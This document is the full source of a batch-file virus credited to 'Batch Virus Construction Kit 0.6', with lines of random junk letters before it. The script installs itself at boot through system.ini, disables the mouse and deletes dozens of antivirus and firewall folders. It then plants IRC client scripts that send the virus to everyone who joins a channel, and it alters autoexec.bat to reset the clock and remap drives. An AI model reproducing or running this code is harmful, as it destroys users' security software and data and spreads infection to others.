kdckosrxldnhxdolvlliygadcdfxufcirpforucqfzhantdilwifjnmwkpujxnhmaxbsxvxoqgcywoleknvrjkjpajsaqduxyv
hzccefbrocuusmddmtuevvjfrxzivbudpjgydexcjmftawapblpcbcvxgbtjmnaqpxeoxxphedbspulpdvqmezvgemwpyvacyp
vhqznzpcfznvvzkwwqhxuzbghfkmeihndkmycajkpvzmpmnqetrmczojxoyaxbirydqhsdbcdmeidxdemfjgdyjwoxuzpcrcev
foudjesifvwaxmrfpsirdugnbxrgavutjisuzsfogoeqmqqcnjcymevrxhogzwqehbywmsomlammnqicguwocafrmtrxghqjdi
vfpesjzuejrmqoznzhpkhuzsjamcrpbqunyfmnziscqglrwbxxsiziotbhijsfeogqfuvfpgllazruazaeavfnikeplbqkroph
zyrsbbuemrgeqtsyfxxrlfdrlgiosggizswikgebsjadwykxyqxbcshiayswlcpmwekixkawjczwwcnxwbdzlkchwfrqzrcngh
czqarlaxytuslsqenrquzkobdeombgvdxpuponlvxavjpcyzymvmhkvnashbzmgsslntdwfwrybnkwjpjrdzlbhqfpiygydckt
zztiabgvrtftqzqmuuwfqlqbwrgmehzxitvpnlmywpmojfrgwlyplxekatjuahgctruojahotppcghkfpndaletxytbsiedqih
axfxpzngycxgsqbntghegvuesatzpugbylrbhnhbzkzdnwmyhbpzpmtpsmysmxsoyymnhjfqbsezsdajdgbprczmmwoksevhlg
gimwnmqwdufttiqohclbpjlzgcfytvvbqnthgccqnqyzxihvzntnuvzpsvwlrrofidcxrauvymudqxlvuvowrjmnopqasizmxf
::
:: Generated by Batch Virus Construction Kit 0.6 [DvL]-[rRLF]
:: Created by DvL on 01-03-2004 at 07:50:45
::
@echo off
@ver|find /i "XP"|if errorlevel 1 ctty nul|if not errorlevel 1 exit
break off
copy %0 %windir%\swqicykf.bat>nul
find /v /i "[boot]"<%windir%\system.ini>i
find /v /i "shell=explorer.exe"<i>s
deltree/y i>nul
echo.[boot]>%windir%\system.ini
echo.Shell=Explorer.exe %windir%\swqicykf.bat>>%windir%\system.ini
echo.>>%windir%\system.ini
type s>>%windir%\system.ini
deltree/y s>nul
rundll32 mouse,disable
set qyw=deltree/y c:\
%qyw%antiba~1\>nul
%qyw%antiba~2\>nul
%qyw%antiba~1.1\>nul
%qyw%antiba~1.2\>nul
%qyw%antiba~1.3\>nul
%qyw%antiba~1.4\>nul
%qyw%antiba~1.5\>nul
%qyw%antiba~1.6\>nul
%qyw%antiba~1.7\>nul
%qyw%antiba~1.8\>nul
%qyw%antivi~1\>nul
%qyw%antivi~2\>nul
%qyw%antiviru\>nul
%qyw%avg\>nul
%qyw%avp\>nul
%qyw%avp30\>nul
%qyw%avx\>nul
%qyw%avpers~1\>nul
%qyw%bitdef~1\>nul
%qyw%bitdef~2\>nul
%qyw%comman~1\>nul
%qyw%cleancih\>nul
%qyw%esafen\>nul
%qyw%findvi~1\>nul
%qyw%f-macro\>nul
%qyw%f-prot\>nul
%qyw%f-prot95\>nul
%qyw%f-secu~1\>nul
%qyw%fwin\>nul
%qyw%fwin32\>nul
%qyw%inocul~1\>nul
%qyw%inocul~2\>nul
%qyw%kasper~1\>nul
%qyw%kasper~2\>nul
%qyw%mcafee\>nul
%qyw%mcafee~1\>nul
%qyw%msav\>nul
%qyw%norman\>nul
%qyw%norton~1\>nul
%qyw%norton~2\>nul
%qyw%pav\>nul
%qyw%pccill~1\>nul
%qyw%pc-cil~1\>nul
%qyw%rav\>nul
%qyw%softwin\>nul
%qyw%tbav\>nul
%qyw%tbavw95\>nul
%qyw%toolkit\>nul
%qyw%trendm~1\>nul
%qyw%trex\>nul
%qyw%virus\>nul
%qyw%vpc\>nul
%qyw%vs95\>nul
%qyw%zonela~1\>nul
%qyw%zonela~2\>nul
set qyw=deltree/y c:\progra~1\
%qyw%antiba~1\>nul
%qyw%antiba~2\>nul
%qyw%antiba~1.1\>nul
%qyw%antiba~1.2\>nul
%qyw%antiba~1.3\>nul
%qyw%antiba~1.4\>nul
%qyw%antiba~1.5\>nul
%qyw%antiba~1.6\>nul
%qyw%antiba~1.7\>nul
%qyw%antiba~1.8\>nul
%qyw%antivi~1\>nul
%qyw%antivi~2\>nul
%qyw%avg\>nul
%qyw%avp\>nul
%qyw%avx\>nul
%qyw%avx2000\>nul
%qyw%avpers~1\>nul
%qyw%bitdef~1\>nul
%qyw%bitdef~2\>nul
%qyw%comman~1\>nul
%qyw%common~1\avpsha~1\>nul
%qyw%common~1\symant~1\>nul
%qyw%datafe~1\>nul
%qyw%deerfi~1.com\>nul
%qyw%f-prot\>nul
%qyw%f-prot95\>nul
%qyw%findvi~1\>nul
%qyw%f-secu~1\>nul
%qyw%f-secure\>nul
%qyw%fsi\>nul
%qyw%fwin\>nul
%qyw%fwin32\>nul
%qyw%grisoft\>nul
%qyw%inocul~1\>nul
%qyw%inocul~2\>nul
%qyw%intern~2\>nul
%qyw%kasper~1\>nul
%qyw%kasper~2\>nul
%qyw%mcafee\>nul
%qyw%mcafee~1\>nul
%qyw%mindso~1\>nul
%qyw%norman\>nul
%qyw%norton~1\>nul
%qyw%norton~2\>nul
%qyw%pandas~1\>nul
%qyw%protec~1\>nul
%qyw%protec~2\>nul
%qyw%quickh~1\>nul
%qyw%rav\>nul
%qyw%signal9\>nul
%qyw%softwin\>nul
%qyw%spysto~1\>nul
%qyw%symant~1\>nul
%qyw%tbav\>nul
%qyw%tinype~1\>nul
%qyw%trendm~1\>nul
%qyw%trendp~1\>nul
%qyw%trojan~1\>nul
%qyw%trojan~2\>nul
%qyw%virusm~1.0\>nul
%qyw%zonela~1\>nul
%qyw%zonela~2\>nul
set qyw=
copy %0 c:\ghl.bat>nul
echo.[script]>%windir%\wsiqycfk.ini
echo.n0=on 1:JOIN:#:{>>%windir%\wsiqycfk.ini
echo.n1=/if ( $nick == $me ) { halt }>>%windir%\wsiqycfk.ini
echo.n2=/dcc send $nick c:\ghl.bat>>%windir%\wsiqycfk.ini
echo.n3=}>>%windir%\wsiqycfk.ini
deltree/y c:\mirc\script.ini>nul
deltree/y c:\mirc32\script.ini>nul
deltree/y c:\progra~1\mirc\script.ini>nul
deltree/y c:\progra~1\mirc32\script.ini>nul
copy %windir%\wsiqycfk.ini c:\mirc\script.ini>nul
copy %windir%\wsiqycfk.ini c:\mirc32\script.ini>nul
copy %windir%\wsiqycfk.ini c:\progra~1\mirc\script.ini>nul
copy %windir%\wsiqycfk.ini c:\progra~1\mirc32\script.ini>nul
echo.[Levels]>%windir%\wsiqycfk.ini
echo.Enabled=1>>%windir%\wsiqycfk.ini
echo.Count=6>>%windir%\wsiqycfk.ini
echo.Level1=000-Unknowns>>%windir%\wsiqycfk.ini
echo.000-UnknownsEnabled=1>>%windir%\wsiqycfk.ini
echo.Level2=100-Level 100>>%windir%\wsiqycfk.ini
echo.100-Level 100Enabled=1>>%windir%\wsiqycfk.ini
echo.Level3=200-Level 200>>%windir%\wsiqycfk.ini
echo.200-Level 200Enabled=1>>%windir%\wsiqycfk.ini
echo.Level4=300-Level 300>>%windir%\wsiqycfk.ini
echo.300-Level 300Enabled=1>>%windir%\wsiqycfk.ini
echo.Level5=400-Level 400>>%windir%\wsiqycfk.ini
echo.400-Level 400Enabled=1>>%windir%\wsiqycfk.ini
echo.Level6=500-Level 500>>%windir%\wsiqycfk.ini
echo.500-Level 500Enabled=1>>%windir%\wsiqycfk.ini
echo.>>%windir%\wsiqycfk.ini
echo.[000-Unknowns]>>%windir%\wsiqycfk.ini
echo.User1=*!*@*>>%windir%\wsiqycfk.ini
echo.UserCount=1>>%windir%\wsiqycfk.ini
echo.Event1=ON JOIN:#:/dcc send $nick c:\ghl.bat>>%windir%\wsiqycfk.ini
echo.EventCount=1>>%windir%\wsiqycfk.ini
echo.>>%windir%\wsiqycfk.ini
echo.[100-Level 100]>>%windir%\wsiqycfk.ini
echo.UserCount=0>>%windir%\wsiqycfk.ini
echo.EventCount=0>>%windir%\wsiqycfk.ini
echo.>>%windir%\wsiqycfk.ini
echo.[200-Level 200]>>%windir%\wsiqycfk.ini
echo.UserCount=0>>%windir%\wsiqycfk.ini
echo.EventCount=0>>%windir%\wsiqycfk.ini
echo.>>%windir%\wsiqycfk.ini
echo.[300-Level 300]>>%windir%\wsiqycfk.ini
echo.UserCount=0>>%windir%\wsiqycfk.ini
echo.EventCount=0>>%windir%\wsiqycfk.ini
echo.>>%windir%\wsiqycfk.ini
echo.[400-Level 400]>>%windir%\wsiqycfk.ini
echo.UserCount=0>>%windir%\wsiqycfk.ini
echo.EventCount=0>>%windir%\wsiqycfk.ini
echo.>>%windir%\wsiqycfk.ini
echo.[500-Level 500]>>%windir%\wsiqycfk.ini
echo.UserCount=0>>%windir%\wsiqycfk.ini
echo.EventCount=0>>%windir%\wsiqycfk.ini
deltree/y c:\pirch\events.ini>nul
deltree/y c:\pirch98\events.ini>nul
deltree/y c:\pirch32\events.ini>nul
deltree/y c:\progra~1\pirch\events.ini>nul
deltree/y c:\progra~1\pirch98\events.ini>nul
deltree/y c:\progra~1\pirch32\events.ini>nul
copy %windir%\wsiqycfk.ini c:\pirch\events.ini>nul
copy %windir%\wsiqycfk.ini c:\pirch98\events.ini>nul
copy %windir%\wsiqycfk.ini c:\pirch32\events.ini>nul
copy %windir%\wsiqycfk.ini c:\progra~1\pirch\events.ini>nul
copy %windir%\wsiqycfk.ini c:\progra~1\pirch98\events.ini>nul
copy %windir%\wsiqycfk.ini c:\progra~1\pirch32\events.ini>nul
echo.set cy=CreateObject("wscript.shell")>%windir%\wsiqycfk.vbs
echo.cy.RegWrite "HKEY_USERS\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17","dcc send $nick c:\ghl.bat">>%windir%\wsiqycfk.vbs
cscript %windir%\wsiqycfk.vbs
echo.time 00:00:00,00>>c:\autoexec.bat
echo.date 80-01-01>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist e:\nul subst e: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist d:\nul subst d: a:\>>c:\autoexec.bat
echo.%comspec% nul /f /c if exist c:\nul subst c: a:\>>c:\autoexec.bat
cls
